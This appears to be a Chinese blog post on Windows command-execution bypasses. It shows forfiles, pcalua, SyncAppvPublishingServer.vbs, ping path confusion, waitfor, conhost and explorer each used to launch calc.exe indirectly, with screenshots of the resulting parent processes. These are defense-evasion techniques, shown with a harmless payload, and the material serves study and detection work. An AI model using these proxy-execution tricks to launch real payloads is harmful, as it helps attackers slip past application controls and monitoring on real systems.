windows命令绕过
forfies
使用方式如下:
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170623625-1409665399.png)
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170628882-2023065162.png)
实际使用:
forfiles /c c:windowssystem32calc.exe
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170638218-1482854279.png)
确认任务的父进程为forfiles.exe
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170643801-581980809.png)
pcalua
实际使用:
pcalua.exe -a c:windowssystem32calc.exe
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170651625-1366959063.png)
主进程就是运行的进程
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170658175-1949791951.png)
SyncAppvPublishingServer
确认powershell版本:
powershell $PSVersionTable.PSVersion
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170704872-405941337.png)
网上说powershell2版本无法运行,但这边实际操作发现是可以运行成功的(尽管有报错)
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170711159-642482397.png)
实际使用:
powershell SyncAppvPublishingServer.vbs "n; Start-Process c:windowssystem32calc.exe"
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170757700-315864586.png)
路径混淆
实际使用:
cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170811088-1371814349.png)
相关解释如下:
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170820078-1603284844.png)
waitfor
这里通过waitfor的发送信号或者等待信号执行命令
实际使用:
waitfor test && C:WindowsSystem32calc.exe
// test为信号的名称
waitfor /s 127.0.0.1 /si test
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170826842-2111806212.png)
conhost
windows 7 和 Windows server 2008 中引进的新的控制台应用程序处理机制
实际使用:
conhost C:WindowsSystem32calc.exe
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170834549-1858993092.png)
explorer
其实也就是Windows系统的文件资源管理器,桌面或者从我的电脑中启动程序都是通过explorer.exe
实际使用:
explorer.exe C:WindowsSystem32calc.exe
explorer.exe /root,"C:WindowsSystem32calc.exe"
explorer.exe test, "C:WindowsSystem32calc.exe"
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170841578-906484888.png)
![](https://img2020.cnblogs.com/blog/1590180/202101/1590180-20210104170856504-1329784638.png)